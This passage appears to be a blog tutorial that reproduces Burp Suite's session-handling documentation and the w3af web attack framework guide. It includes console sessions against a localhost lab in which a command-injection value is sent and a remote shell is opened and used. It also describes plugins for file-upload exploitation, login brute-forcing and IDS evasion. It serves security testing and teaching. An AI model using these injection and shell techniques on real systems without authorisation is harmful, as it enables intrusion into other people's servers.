When you have recorded the macro, the macro editor shows the details of the items in the macro, which you can review and configure as required: As well as the basic sequence of requests, each macro includes some important configuration about how items in the sequence should be handled, and any interdependencies between items:

For each item in the macro, the following settings can be configured:

 Whether cookies from the session handling cookie jar should be added to the request.  Whether cookies received in the response should be added to the session handling cookie jar.  For each parameter in the request, whether it should use a preset value, or a value derived from a previous response in the macro.  Whether key characters should be URL-encoded in updated parameter values.

The ability to derive a parameter's value from a previous response in the macro is particularly useful in some multi-stage processes, and in situations where applications make aggressive use of anti-CSRF tokens. When a new macro is defined, Burp tries to automatically find any relationships of this kind, by identifying parameters whose values can be determined from the preceding response (form field values, redirection targets, query strings in links, etc.). You can easily review and edit the default macro configuration applied by Burp before the macro is used. Further, the configured macro can be tested in isolation, and the full request/response sequence reviewed, to check that it is functioning in the way you require.

Worked example

Let's look at an application function which can only be accessed within an authenticated session, and employs a further token to defend against CSRF attacks. You want to test this function for various input-based vulnerabilities like XSS and SQL injection. Performing automated (and some manual) testing of this function faces two challenges: (a) ensuring that the session being used remained valid; and (b) obtaining a valid token to use in each request. Burp's session handling functionality can take care of both these challenges.

To do this, we're going to define some session handling rules. These rules will be applied to each request that is made to the function we are testing by the Intruder, Scanner and Repeater tools:

 Check whether the current session is valid, by requesting the user's landing page in the application, and inspecting the response to confirm that the user is still logged in.  If the user is not logged in, log them back in to obtain a valid session.  Request the page containing the form whose submission we are going to test. This form contains the anti-CSRF token that we need, within a hidden field.  Update the request to the function we are testing with the value of the anti-CSRF token.

In most situations, we need to make use of Burp's own session handling cookie jar, so the first rule we define tells Burp to add cookies from the cookie jar to every request. This is, in fact, the default rule for the Scanner and Spider tools, so we'll just modify the default rule to apply to the Intruder and Repeater tools as well. This rule performs a single action, shown below: The rule's scope is defined to include the relevant tools, and apply to all URLs: Next, we need to check that the user's current session on the target application is valid. Assuming we want to apply this rule to all requests within the target application, we can define it to be in-scope for the whole of the application's domain: We then add a suitable description and add an action of the type "check session is valid": This opens the editor for this type of action, which contains a lot of configuration options: The first set of options determines which request Burp uses to validate the current session. The options are:

 Issue the actual request that is currently being processed. This option is ideal if the application always responds to out-of-session requests with a common response signature, such as a redirection to the login.  Run a macro, to make one or more other requests. This option is ideal if, to identify whether the session is valid, you need to request a standard item, such as the user's home page. It is also the best option if you need to apply further rules to modify the request currently being processed - for example (as in the present case) to update an anti-CSRF token in the request. If the option to run a macro is selected, you have a further option whether to do this every for every request, or only every N requests. If the application is aggressive in terminating sessions in response to unexpected input, it is recommended that you validate the session every time; otherwise, you can speed things up by only validating the session periodically. For the current example, we are going to run a macro to fetch the user's landing page in the application, to check that their session is valid. To do this, we need to define our macro, by clicking on the "new" button in the previous screenshot. This opens the macro recorder, enabling us to select the request(s) that we wish to include in the macro. In the present case, we only need to select the GET request for the user's landing page:

The second set of options in the "check session is valid" action controls how Burp inspects the (final) response from the macro to determine whether the session is valid. Various options are available, and the configuration we need in the present case is shown below: The final set of options for this action determines how Burp will behave depending on whether the current session is valid:

 You can tell Burp not to perform any further actions for this request if the session is valid. Using this option lets you define subsequent, separate actions to recover a valid session. This option is mandatory if the request itself has already been issued in order to determine whether the session is valid.  You can tell Burp to perform a sub-action if the session is invalid, and then continue to process subsequent actions. This is useful when you need to define subsequent actions in any case, following the session validity check, for example to run a macro to obtain a request token or modify the application's state.

In the present example, we need to use the second option. If the session is invalid, we will run a macro to log the user back in. We need to record a further macro, to perform the actual login, and tell Burp to run this macro and update the session handling cookie jar based on the results: At this point, we have configured Burp to update requests with cookies from its cookie jar, and to log the user back in to the target application when their session is invalid. To complete the required configuration, we need to define a further rule to deal with the anti-CSRF token used in the function we want to test. The request we are testing looks like this:

POST /auth/4/NewUserStep2.ashx HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: mdsec.net Content-Length: 137 Cookie: SessionId=39DD9F0CB979BFB431005524A4010244 realname=testuser&username=testuser&userrole=user&password=letmein1&confirmpas sword=letmein1&nonce=938549246127349541173

To ensure that our requests to this function are properly handled, we need to ensure that a valid nonce is supplied with each request. The value of this nonce is supplied by the application in a hidden field within the form that generates the above request. So our rule needs to run a macro to fetch the page containing the form, and update the current request with the value of the nonce parameter. We add a further rule with an action of the type "run macro" and configure it as follows:

In the above configuration, we have specified that Burp should run a new macro, which fetches the form containing the anti-CSRF token, and then obtain the nonce parameter from the (final) macro response, and update this in the request. Alternatively, we could select the "update all parameters" option, and Burp would automatically attempt to match parameters in the request with those specified in the macro response.

In terms of the scope for this rule, this obviously needs to be defined more narrowly than the whole application domain. For example, we could define the rule to apply only to the exact URL in the above request. This is the best option if the application only employs anti-CSRF tokens in a few locations. However, in some applications, tokens are used for a large number of functions, and a token obtained within one function can be submitted within a different function. In this situation, we could define a rule that applies to the whole domain, but only to requests containing a specified parameter name. In this way, any time a request is made to the application that contains an anti- CSRF token, the rule will execute and Burp will fetch a new valid token to use in the request.

The full configuration, with its three session handling rules and three macros, looks like this within the main Burp UI: You can test the configuration is working by logging out of the application, sending the authenticated, token-protected request to Burp Repeater, and verifying that it performs the required action. The request will probably take longer to return than normal, because behind the scenes Burp is making several other requests, to validate your session, log in again if necessary, and obtain a token to use in the request.

If you find your rules are not working in the way you intended, you can use the session handling tracer to troubleshoot the problem. Once you are happy that your session handling rules are working correctly, you can send the request to Burp Intruder or Scanner, to perform your automated testing in the normal way.

Session handling tracer

The configuration needed to apply Burp's session handling functionality to the features of real-world applications is often complex, and mistakes are easily made. Burp provides a tracer function for troubleshooting the session handling configuration. This shows you all of the steps performed when Burp applies session handling rules to a request, allowing you to see exactly how requests are being updated and issued. You can access the session handling tracer via options / sessions / view sessions tracer: Integration with Burp tools

It is worth noting a few points about how the session handling features affect some of Burp's other functionality:  There is a default session handling rule which updates all requests made by the Scanner and Spider with cookies from Burp's cookie jar. This ensures that all spidering and sanning requests are made in-session, provided you maintain a valid session using your browser. It also means that items in the active scan queue that are loaded from a state file will be scanned within your current session, not the session that was active when the state file was saved. If this is not the behaviour you require, you should disable the default session handling rule before performing any scanning.  In cases where session handling rules modify a request before it is made (for example, to update a cookie or other parameter), some of Burp's tools will show the final, updated request, for purposes of clarity. This applies to the Intruder, Repeater and Spider tools. Requests that are shown within reported Scanner issues continue to show the original request, to facilitate clear comparison with the base request, where necessary. To observe the final request for a scan issue, as modified by the session handler, you can send the request to Burp Repeater and issue it there.  When the Scanner or Intruder makes a request that manipulates a cookie or parameter that is affected by a session handling action, the action is not applied to that request, to avoid interfering with the test that is being performed. For example, if you are using Intruder to fuzz all the parameters in a request, and you have configured a session handing rule to update the "sessid" cookie in that request, then the "sessid" cookie will be updated when Intruder is fuzzing other parameters. When Intruder is fuzzing the "sessid" cookie itself, Burp will send the Intruder payload string as the "sessid" value, and will not update it as is done normally.

This means you have gone through all the modules in Burp Suite.So you have got an idea on how to hack an web application using burp suite but wait you forgot that W3AF was in store.

All the Burp Data has been flicked from a place which had the following message:

Copyright © 2010 PortSwigger Ltd. All rights reserved

So thanks to PortSwigger For the Interesting Help Manual for the hackers. The W3AF Framework:

This part is a guide for the Web Application Attack and Audit Framework ( w3af ), its goal is to provide a basic overview of what the framework is, how it works and what you can do with it. w3af is a complete environment for auditing and attacking web applications. This environment provides a solid platform for auditing and penetration-testing.

I will try to make it precise because I will have a great pain to copy paste the materials and put it in formatted manner.

But I will give what It needs for you to learn the framework.Ok then its get set GO. Download The framework can be downloaded from the project main page: http://w3af.sf.net/#download There are two ways to install w3af: from a release package (w3af setup for windows and tgz package for Unix based systems) or from SVN. First time users should use the latest package, while more advanced users should perform a SVN checkout to get the latest version of the framework.

Installation The framework should work on all platforms supported by Python, particularly, w3af has been tested on Linux, Windows XP, Windows Vista and OpenBSD. This user guide will guide you through the installation on a Linux platform, installing w3af in a Windows box is straight forward if you use the available installer which can be downloaded from the official w3af site.

Installation Requirements The required packages to run w3af can be divided in two groups: ● Core requirements: – Python 2.5 – fpconst-0.7.2 – pygoogle – nltk – SOAPpy – pyPdf – Beautiful Soup – Python OpenSSL – json.py – scapy ● Graphical user interface requirements: – python sqlite3 – graphviz – pygtk 2.0 – gtk 2.12 As you may have guessed, the core requirements are needed to run w3af with any user interface (console or graphical), and the graphical user interface requirements are needed only if you plan to use the GTK+ user interface. Some of the requirements are bundled with the distribution file, in order to make the installation process easier for the novice user. The bundled requirements can be found inside the extlib directory. Most of the libraries can be run from that directory, but some others require an installation process, the installation steps for these libraries are (as root): cd w3af cd extlib cd fpconst0.7.2 python setup.py install cd .. cd pygoogle python setup.py install cd .. cd nltk python setup.py install cd .. cd SOAPpy python setup.py install cd pyPdf python setup.py install w3af phases

Before even running w3af a user must know how the application is divided and how plugins are going to be executed. Basically, w3af has three types of plugins: discovery , audit and attack. Discovery plugins have only one responsibility, finding new URLs, forms, and other “injection points”. A classic example of a discovery plugin is a web spider. This plugin takes a URL as input and returns one or more injection points. When a user enables more than one plugin of this type, they work in a loop: If plugin A finds a new URL in the first run, the w3af core will send that URL to plugin B. If plugin B then finds a new URL, it will be sent to plugin A. This process will go on until all plugins are run and no more knowledge about the application can be found using the enabled discovery plugins. Audit plugins take the injection points found by discovery plugins and send specially crafted data to all of them in order to find vulnerabilities. A classic example of an audit plugin is one that searches for SQL injection vulnerabilities. Attack plugins objective is to exploit vulnerabilities found by audit plugins. They usually return a shell on the remote server, or a dump of remote tables in the case of SQL injections exploits.

Running w3af w3af has two user interfaces, the console user interface (consoleUI) and the graphical user interface (gtkUi). This user guide will focus on the consoleUI, which is, at the moment of this writing much more tested and complete than the gtkUi. To fire up the consoleUI you just have to execute w3af without parameters and you will get a prompt like this one:

$ ./w3af_console w3af>>>

From this prompt you will be able to configure the framework, launch scans and ultimately exploit a vulnerability. At this point you can start typing commands, the first command you have to learn is “help” (please note that commands are case sensitive): w3af>>> help || | start | Start the scan. | | plugins | Enable and configure plugins. | | exploit | Exploit the vulnerability. | | profiles | List and use scan profiles. | || | httpsettings | Configure the http settings of the | | | framework. | | miscsettings | Configure w3af misc settings. | | target | Configure the target URL. | || | back | Go to the previous menu. | | exit | Exit w3af. | | assert | Check assertion. | || | help | Display help. issuing: help [command]| | | , prints more specific help about | | | "command" | | version | Show w3af version information. | | keys | Display key shortcuts. | || w3af>>> w3af>>> help target Configure the target URL. w3af>>>

The main menu commands are explained in the help that is displayed above. The internals of every menu will be seen later in this document. As you already noticed, the “help” command can take a parameter, and if available, a detailed help for that parameter will be shown, e.g. “help keys”. Other interesting things to notice about the consoleUI are the tab completion (type 'plu' and then TAB) and the command history (after typing some commands, navigate the history with the up and down arrows). To enter a configuration menu, you just have to type it's name and hit enter, you will see how the prompt changes and you are now in that context: w3af>>>httpsettings w3af/config:httpsettings>>>

All the configuration menus provide the following commands: ● help ● view ● set ● back

Here is a usage example of this commands in the http-settings menu: w3af/config:httpsettings>>> help || | view | List the available options and their values. | | set | Set a parameter value. | || | back | Go to the previous menu. | | exit | Exit w3af. | | assert | Check assertion. | || w3af/config:httpsettings>>> view || | Setting | Value | Description | | | timeout | 10 | The | | | | timeout | | | | for | | | | connections | | | | to the | | | | HTTP | | | | server | | headersFile | | Set the | | | | headers | | | | filename. | | | | This | | | | file | | | | has | | | | additional | | | | headers | | | | that | | | | are | | | | added | | | | to each | | | | request. | || | ignoreSessCookies | False | Ignore | | | | session | | | | cookies | | cookieJarFile | | Set the | | | | cookiejar | | | | filename. | || ... w3af/config:httpsettings>>> set timeout 5 w3af/config:httpsettings>>> view ... | timeout | 5 | The | ...

To summarize, the “view” command is used to list all configurable parameters, with their values and a description. The set command is used to change its value. Finally we can execute “back”, “.” or press CTRL+C to return to the previous menu. A detailed help for every configuration parameter can be obtained using “help parameter” like shown in this example: w3af/config:httpsettings>>> help timeout Help for parameter timeout: ======Set low timeouts for LAN use and high timeouts for slow Internet connections. w3af/config:httpsettings>>> The “http-settings” and the “misc-settings” configuration menus are used to set system wide parameters that are used by the framework. All the parameters have defaults and in most cases you can leave them as they are. w3af was designed in a way that allows beginners to run it without having to learn a lot of its internals, and also flexible enough to be tunned by experts that know what they want and need to change internal configuration parameters to fulfill their tasks. Running w3af with GTK user interface

The framework also has a graphical user interface that you can start by executing: $ ./w3af_gui The graphical user interface allows you to perform all the actions that the framework offers and features a much easier and faster way to start a scan and analyze the results. In case you are wondering how the graphical user interface looks like, here is a screen shot:

Plugins Plugins do all the magic. The plugins will find the URLs, discover the vulnerabilities and exploit them. So now, we will learn how to configure the plugins. In a previous section I told you that w3af had three types of plugins: discovery, audit and exploit. Well, I actually lied a little bit because w3af other plugin types. The complete list of plugins types is: ● discovery ● audit ● grep ● exploit ● output ● mangle ● bruteforce ● evasion As said before, discovery plugins find new points of injection, that are later used by audit plugins to find vulnerabilities. Grep plugins analyze all page content and find vulnerabilities on pages that are requested by other plugins; for example a grep plugin will find a comment on the HTML body that has the word “password” inside it and generate a vulnerability based on it. Exploit plugins [ab]use the vulnerabilities found in the audit phase and return something useful to the user ( remote shell, SQL table dump, a proxy, etc ). Output plugins are the way the framework and the plugins communicate with the user, output plugins save the data to a text or html file. Debugging information is also sent to the plugins and can be saved for analysis. Mangle plugins are a way to modify requests and responses based on regular expressions, think “sed (stream editor) for the web”. Bruteforce plugins will bruteforce logins, they are actually part of the discovery phase. Finally, evasion plugins try to evade simple intrusion detection rules.

Plugin configuration The plugins are configured using the “plugins” configuration menu. Lets see how to do that: w3af>>> plugins w3af/plugins>>> help || | list | List available plugins. | || | back | Go to the previous menu. | | exit | Exit w3af. | | assert | Check assertion. | || | mangle | View, configure and enable mangle plugins | | evasion | View, configure and enable evasion plugins | | discovery | View, configure and enable discovery plugins | | grep | View, configure and enable grep plugins | | bruteforce | View, configure and enable bruteforce plugins | | audit | View, configure and enable audit plugins | | output | View, configure and enable output plugins | || w3af/plugins>>> As you may have noticed, all plugins can be configured here except the exploit plugins, we will talk about them later. The first step to take here is to know the syntax for configuring the plugins, so lets do that: w3af/plugins>>> help audit

View, configure and enable audit plugins Syntax: audit [config plugin | plugin1[,plugin2 ... pluginN] | desc plugin] Example: audit Result: All enabled audit plugins are listed. Example2: audit LDAPi,blindSqli Result: LDAPi and blindSqli are configured to run Example3: audit config LDAPi Result: Enters to the plugin configuration menu. Example4: audit all,!blindSqli Result: All audit plugins are configured to run except blindSqli. Example1: audit desc LDAPi Result: You will get the plugin description w3af/plugins>>> help list List available plugins. Syntax: list {plugin type} [all | enabled | disabled] By default all plugins are listed. w3af/plugins>>> Ok, so w3af is nice enough to tell us how to use it. Now we will see how to get a list of the available plugins and their status: w3af/plugins>>> list audit || | Plugin name | Status | Conf | Description | || | LDAPi | | | Find LDAP injection | | | | | bugs. | | blindSqli | | Yes | Find blind SQL | | | | | injection | | | | | vulnerabilities. | | buffOverflow | | | Find buffer overflow | | | | | vulnerabilities. | | dav | | | Tries to upload a | | | | | file using HTTP PUT | | | | | method. | | eval | | | Finds incorrect usage | | | | | of the eval(). | ... To enable the xss and sqli plugins, and then verify that the command was understood by the framework, we issue this set of commands: w3af/plugins>>> audit xss, sqli w3af/plugins>>> audit || | Plugin name | Status | Conf | Description | || ... | sqli | Enabled | | Find SQL injection | | | | | bugs. | ... | xss | Enabled | Yes | Find cross site | | | | | scripting | | | | | vulnerabilities. | | xst | | | Verify Cross Site | | | | | Tracing | | | | | vulnerabilities. | || w3af/plugins>>> Or if the user is interested in knowing exactly what a plugin does, he can also run the “desc” command like this: w3af>>> plugins w3af/plugins>>> audit desc fileUpload This plugin will try to expoit insecure file upload forms. One configurable parameter exists: extensions The extensions parameter is a comma separated list of extensions that this plugin will try to upload. Many web applications verify the extension of the file being uploaded, if special extensions are required, they can be added here. Some web applications check the contents of the files being uploaded to see if they are really what their extension is telling. To bypass this check, this plugin uses file templates located at "plugins/audit/fileUpload/", this templates are valid files for each extension that have a section ( the comment field in a gif file for example ) that can be replaced by scripting code ( PHP, ASP, etc ). After uploading the file, this plugin will try to find it on common directories like "upload" and "files" on every know directory. If the file is found, a vulnerability exists. w3af/plugins>>> Now we know what this plugin does, but let's check their internals: w3af/plugins>>> audit config xss w3af/plugins/audit/config:xss>>> view || | Setting | Value | Description | || | numberOfChecks | 3 | Set the amount of checks to | | | | perform for each fuzzable | | | | parameter. Valid numbers: 1 to | | | | 13 | | checkStored | True | Search persistent XSS | || w3af/plugin/xss>>> set checkStored False w3af/plugin/xss>>> back w3af/plugins>>> audit config sqli w3af/plugins/audit/config:sqli>>> view || | Setting | Value | Description | || || w3af/plugins/audit/config:sqli>>> w3af/plugins/audit/config:sqli>>> back w3af/plugins>>>

The configuration menus for the plugins also have the set command for changing the parameters values, and the view command for listing existing values. On the previous example we disabled persistent cross site scripting checks in the xss plugin, and listed the options of the sqli plugin (it actually has no configurable parameters).

Starting a scan

After configuring all desired plugins the user has to set the target URL and finally start the scan. The target selection is done this way: w3af>>> target w3af/config:target>>> set target http://localhost/ w3af/config:target>>> back w3af>>> Finally, you execute “start” in order to run all the configured plugins. w3af>>> start

At any time during the scan, you may hit “enter” in order to get a live status of the w3af core. Status lines look like this: Status: Running discovery.webSpider on http://localhost/w3af/ | Method: GET.

A complete session

A complete w3af session would look like this ( see the inline comments ): $ ./w3af w3af>>> plugins w3af/plugins>>> output console,textFile w3af/plugins>>> output config textFile w3af/plugins/output/config:textFile>>> set fileName outputw3af. txt w3af/plugins/output/config:textFile>>> set verbose True w3af/plugins/output/config:textFile>>> back w3af/plugins>>> output config console w3af/plugins/output/config:console>>> set verbose False w3af/plugins/output/config:console>>> back

All this previous commands have enabled two output plugins, console and textFile and configured them as needed. w3af/plugins>>> discovery allowedMethods,webSpider w3af/plugins>>> back In this case, we will be running only discovery plugins. The enabled plugins are allowedMethods and webSpider . w3af>>> target w3af/target>>>set target http://localhost/w3af/ w3af/target>>>back w3af>>> start

New URL found by discovery: http://localhost/w3af/responseSplitting/responseSplitting.php New URL found by discovery: http://localhost/w3af/blindSqli/blindSqlistr. php New URL found by discovery: http://localhost/w3af/webSpider/2.html ...... The URL: http://localhost/beef/hook/ has DAV methods enabled: OPTIONS GET HEAD POST TRACE PROPFIND PROPPATCH COPY MOVE LOCK UNLOCK DELETE ( is possibly enabled too, not tested for safety ) New URL found by discovery: http://localhost/w3af/globalRedirect/wargame/ New URL found by discovery: http://localhost/w3af/globalRedirect/w3afsite. tgz After the discovery phase is finished a summary is presented to the user: The list of found URLs is: http:// localhost/w3af/globalRedirect/w3af.testsite.tgz http:// localhost/beef/hook/beefmagic.js.php http:// localhost/w3af/globalRedirect/2.php – http://localhost/w3af/webSpider/11.html ... A section of the summary is the points of injection that will be used in the audit phase: Found 78 URLs and 102 different points of injection. The list of Fuzzable requests is: http:// localhost/w3af/ | Method: GET http:// localhost/w3af/responseSplitting/responseSplitting.php | Method: GET | Parameters: (header) – http://localhost/w3af/sqli/dataReceptor.php | Method: POST | Parameters: (user,firstname) Finally the user exits the application, returning to the shell. w3af>>> exit w3af, better than the regular script kiddie. $

A warning about discovery

The discovery phase is a double edged sword: use it with wisdom, and it will give you a lot of knowledge about the remote web application, use it in a greedy way and you will be waiting for hours until the discovery phase ends. Just to make things clear, the greedy way is to enable all discovery plugins ( “discovery all” ) without even knowing what you are doing or having manually browsed the web and understood its internals. Some examples will make things clear:

● “You are testing an intranet web application, the web application is huge and doesn't use any macromedia flash or javascript code”. Recommendation : “discovery all,!spiderMan, !fingerGoogle, !fingerMSN, ! fingerPKS, !MSNSpider, !googleSpider, !phishtank, !googleSafeBrowsing”. Reason: Spiderman should only be used when webSpider can't find all links. The fingerGoogle, fingerMSN and fingerPKS plugins discover mail addresses from search engines, if this is an intranet application, the addresses put in this site wont be available in search engines because they never were indexed. MSNSpider and googleSpider find URLs using search engines, like the ones before, they are useless because search engines don't index private pages. phishtank and googleSafeBrowsing should be enabled because they search for phishing sites, and like the ones before them, private sites aren't indexed in this systems.

● “You are testing a web application over the internet, the web application is huge and doesn't use any macromedia flash or javascript code”. Recommendation : “discovery all,!spiderMan, !wordnet , !googleSets”. Reason: Spiderman should only be used when webSpider can't find all links. The wordnet and googleSets plugins are two plugins that take a long time to run over the internet so it's a good idea to disable them.

● “You are testing a web application over the internet, the web application is huge and has macromedia flash or javascript code. You also know that the application doesn't implement any web services”. Recommendation : “discovery all, !wordnet , !googleSets, !wsdlFinder”. Reason: The wordnet and googleSets plugins are two plugins that take a long time to run over the internet so it's a good idea to disable them. Regarding wsdlFinder, if we already know that no web services exist, why look for them?

● “You are testing a web application over the internet, the web application is huge, you really need to know all the links and functionality of the site and you don't care waiting.”. Recommendation : “discovery all” . Reason: You really need to get a lot of knowledge about the site and don't care if it takes a complete day.

When everything else fails...

So, you enabled only the recommended plugins in the discovery phase, you started the framework one hour ago, the discovery is still running and doesn't find anything. When you find yourself in this situation you have two options, waiting for w3af to finish or hitting CTRL+C to finish the discovery and start with the audit phase. You should also remember that if you are saving the debug information to a text file you can open a new terminal and run a “tail -f w3af-output-file.txt” to see what w3af is really doing. w3af scripts

While developing w3af, I realized that I needed a fast way to execute the same steps over and over, so the script functionality was born. w3af can run a script file using the “-s” argument. Script files are text files with one command on each line. An example script file would look like this:

$ head scripts/scriptosCommanding. w3af # This is the osCommanding demo: plugins output console,textFile output output config textFile set fileName outputw3af. txt set verbose True back To run this script you would execute “./w3af_console s scripts/scriptosCommanding. w3af” , the output would look just like if you typed every command by hand in the console:

$ ./w3af_console s scripts/scriptosCommanding. w3af w3af>>>plugins w3af/plugins>>>output console,textFile w3af/plugins>>>output || | Plugin | Status | Conf | Description | | name | | | | || | console | Enabled | Yes | Print messages to the | | | | | console. | | gtkOutput | | | Saves messages to | | | | | kb.kb.getData('gtkOutput', | | | | | 'queue'), messages are saved | | | | | in the form of objects. | | htmlFile | | Yes | Print all messages to a HTML | | | | | file. | | textFile | Enabled | Yes | Prints all messages to a | | | | | text file. | | webOutput | | | Print all messages to the | | | | | web user interface this | | | | | plugin and the web user | | | | | interface are DEPRECATED. | ||

w3af/plugins>>>output config textFile w3af/plugins/output/config:textFile>>>set fileName outputw3af. txt w3af/plugins/output/config:textFile>>>set verbose True w3af/plugins/output/config:textFile>>>back w3af/plugins>>>output config console w3af/plugins/output/config:console>>>set verbose False w3af/plugins/output/config:console>>>back w3af/plugins>>>back w3af>>>plugins w3af/plugins>>>audit osCommanding w3af/plugins>>>back w3af>>>target w3af/config:target>>>set target http://localhost/w3af/osCommanding/vulnerable.php?command=f0as9 w3af/config:target>>>back w3af>>>start

Found 1 URLs and 1 different points of injection. The list of URLs is: http:// localhost/w3af/osCommanding/vulnerable.php The list of fuzzable requests is: http:// localhost/w3af/osCommanding/vulnerable.php | Method: GET | Parameters: (command) Starting osCommanding plugin execution. OS Commanding was found at: "http://localhost/w3af/osCommanding/ vulnerable.php", using HTTP method GET. The sent data was: "command=+ping+c+ 9+localhost". The vulnerability was found in the request with id 5. Finished scanning process. w3af>>>exploit w3af/exploit>>>exploit osCommandingShell osCommandingShell exploit plugin is starting. The vulnerability was found using method GET, tried to change the method to POST for exploiting but failed. Vulnerability successfully exploited. This is a list of available shells: [ 0] Please use the interact command to interact with the shell objects. w3af/exploit>>>interact 0 Execute "endInteraction" to get out of the remote shell. Commands typed in this menu will be runned on the remote web server. w3af/exploit/osCommandingShell0>>> ls vulnerable.php vulnerable2.php w3afAgentClient.log w3af/exploit/osCommandingShell0>>> endInteraction w3af/exploit>>>back w3af>>>exit spawned a remote shell today? $

The Output

All the output of w3af is managed by the output plugins. Each output plugin will write in a different format ( txt, html, etc ), for example the textFile plugin writes all output to the output-w3af.txt file by default. The configuration of this plugins is done just like other plugins, as seen before:

$ ./w3af_console w3af>>> plugins w3af/plugins>>> output console,textFile w3af/plugins>>> output config textFile w3af/plugins/output/config:textFile>>> set fileName outputw3af. txt w3af/plugins/output/config:textFile>>> set verbose True w3af/plugins/output/config:textFile>>> back w3af/plugins>>> output config console w3af/plugins/output/config:console>>> set verbose False w3af/plugins/output/config:console>>> back

This will configure the textFile plugin to output all messages, including the debugging information ( see “set verbose True” ) to the “outputw3af. txt” file. Here is an example of what is written to this file: [ Sun Sep 14 17:36:09 2008 debug w3afCore ] Exiting setOutputPlugins() [ Sun Sep 14 17:36:09 2008 debug w3afCore ] Called w3afCore.start() [ Sun Sep 14 17:36:09 2008 debug xUrllib ] Called buildOpeners [ Sun Sep 14 17:36:09 2008 debug keepalive ] keepalive: The connection manager has 0 active connections. [ Sun Sep 14 17:36:09 2008 debug keepalive ] keepalive: added one connection, len(self._hostmap["localhost"]): 1 [ Sun Sep 14 17:36:09 2008 debug httplib ] DNS response from DNS server for domain: localhost [ Sun Sep 14 17:36:09 2008 debug xUrllib ] GET http://localhost/w3af/osCommanding/vulnerable.php?command=f0as9 returned HTTP code "200"

Output plugins also handle the logging of HTTP requests and responses, every plugin handles this data in a different way, for example, the textFile plugin writes requests and responses to a file, while the htmlFile plugin disregards the data and simply does nothing with it. An example of a HTTP log written by the textFile follows: ======Request 4 Sun Sep 14 17:36:12 2008======GET http://localhost/w3af/osCommanding/vulnerable.php? command=+ping+c+ 4+localhost HTTP/1.1 Host: localhost Acceptencoding: identity Accept: */* Useragent: w3af.sourceforge.net ======Response 4 Sun Sep 14 17:36:12 2008======HTTP/1.1 200 OK date: Sun, 14 Sep 2008 20:36:09 GMT transferencoding: chunked xpoweredby: PHP/5.2.42ubuntu5.3 contenttype: text/html server: Apache/2.2.8 (Ubuntu) mod_python/3.3.1 Python/2.5.2 PHP/ 5.2.42ubuntu5.3 with SuhosinPatch PING localhost (127.0.0.1) 56(84) bytes of data. 64 bytes from localhost (127.0.0.1): icmp_seq=1 ttl=64 time=0.024 ms 64 bytes from localhost (127.0.0.1): icmp_seq=2 ttl=64 time=0.035 ms 64 bytes from localhost (127.0.0.1): icmp_seq=3 ttl=64 time=0.037 ms 64 bytes from localhost (127.0.0.1): icmp_seq=4 ttl=64 time=0.037 ms localhost ping statistics 4 packets transmitted, 4 received, 0% packet loss, time 2999ms rtt min/avg/max/mdev = 0.024/0.033/0.037/0.006 ms ======Just in case you are wondering, all messages sent by the plugins and the framework are sent to ALL enabled plugins, so if you have enabled textFile and htmlFile output plugins, both will log a vulnerability found by an audit plugin.

Complex sites

Some sites use embedded objects, like macromedia flash and java applets, that the browser renders to the user. Because of the inability of the framework to get any information out of those objects, a script called spiderMan was created. This script will run a HTTP proxy so the user can navigate the target site through it; during this process the plugin will extract information from the requests and responses. A simple example will clarify things, let's suppose that w3af is auditing a site and can't find any links on the main page. After a closer interpretation of the results by the user, it is clear that the main page has a java applet menu where all the other sections are linked. The user runs w3af once again and now activates the spiderMan plugin, navigates the site manually using the browser and the spiderman proxy. When the user has finished his browsing, w3af will continue with all the hard auditing work. The spiderMan plugin can be used when javascript, flash, java applets or any other browser side technology is present. This is a sample spiderMan plugin run: w3af>>> plugins w3af/plugins>>> discovery spiderMan w3af/plugins>>> back w3af>>> target w3af/target>>> set target http://localhost/w3af/fileUpload/ w3af/target>>> back w3af>>> start spiderMan proxy is running on 127.0.0.1:44444 . Please configure your browser to use these proxy settings and navigate the target site. To exit spiderMan plugin please navigate to http://127.7.7.7/spiderMan?terminate . Now the user configures the browser to use the 127.0.0.1:44444 proxy and navigates the target site, after that he navigates to “http://127.7.7.7/spiderMan? terminate” and exits the spiderMan. The results are shown: New URL found by discovery: http://localhost/w3af/test New URL found by discovery: http://localhost/favicon.ico New URL found by discovery: http://localhost/w3af/ New URL found by discovery: http://localhost/w3af/img/w3af.png New URL found by discovery: http://localhost/w3af/xssforms/ testforms. html New URL found by discovery: http://localhost/w3af/xssforms/ dataReceptor.php The list of found URLs is: http:// localhost/w3af/fileUpload/ http:// localhost/w3af/test http:// localhost/w3af/xssforms/ dataReceptor.php http:// localhost/w3af/ http:// localhost/w3af/img/w3af.png http:// localhost/w3af/xssforms/ testforms. html http:// localhost/w3af/fileUpload/uploader.php http:// localhost/favicon.ico Found 8 URLs and 8 different points of injection. The list of Fuzzable requests is: http:// localhost/w3af/fileUpload/ | Method: GET http:// localhost/w3af/fileUpload/uploader.php | Method: POST | Parameters: (MAX_FILE_SIZE,uploadedfile) http:// localhost/w3af/test | Method: GET http:// localhost/favicon.ico | Method: GET http:// localhost/w3af/ | Method: GET http:// localhost/w3af/img/w3af.png | Method: GET http:// localhost/w3af/xssforms/ testforms. html | Method: GET http:// localhost/w3af/xssforms/ dataReceptor.php | Method: POST | Parameters: (user,firstname) Starting sqli plugin execution. w3af>>>

Exploiting Two ways of exploiting a vulnerability exist, the first one uses the vulnerabilities found by the audit phase and the second one, which is called fastextploit, requires the user to enter the vulnerability parameters.

Let's see an example of the first way of exploiting a vulnerability with w3af: w3af>>>plugins w3af/plugins>>>audit osCommanding w3af/plugins>>>back w3af>>>target w3af/config:target>>>set target http://localhost/w3af/osCommanding/vulnerable.php?command=f0as9 w3af/config:target>>>back w3af>>>start Found 1 URLs and 1 different points of injection. The list of URLs is: http:// localhost/w3af/osCommanding/vulnerable.php The list of fuzzable requests is: http:// localhost/w3af/osCommanding/vulnerable.php | Method: GET | Parameters: (command) Starting osCommanding plugin execution. OS Commanding was found at: "http://localhost/w3af/osCommanding/ vulnerable.php", using HTTP method GET. The sent data was: "command=+ping+c+ 9+localhost". The vulnerability was found in the request with id 5. Finished scanning process. w3af>>>exploit w3af/exploit>>>exploit osCommandingShell osCommandingShell exploit plugin is starting. The vulnerability was found using method GET, tried to change the method to POST for exploiting but failed. Vulnerability successfully exploited. This is a list of available shells: [ 0] Please use the interact command to interact with the shell objects. w3af/exploit>>>interact 0 Execute "endInteraction" to get out of the remote shell. Commands typed in this menu will be runned on the remote web server. w3af/exploit/osCommandingShell0>>> ls vulnerable.php vulnerable2.php w3afAgentClient.log w3af/exploit/osCommandingShell0>>> endInteraction w3af/exploit>>>back w3af>>> The second way is to use 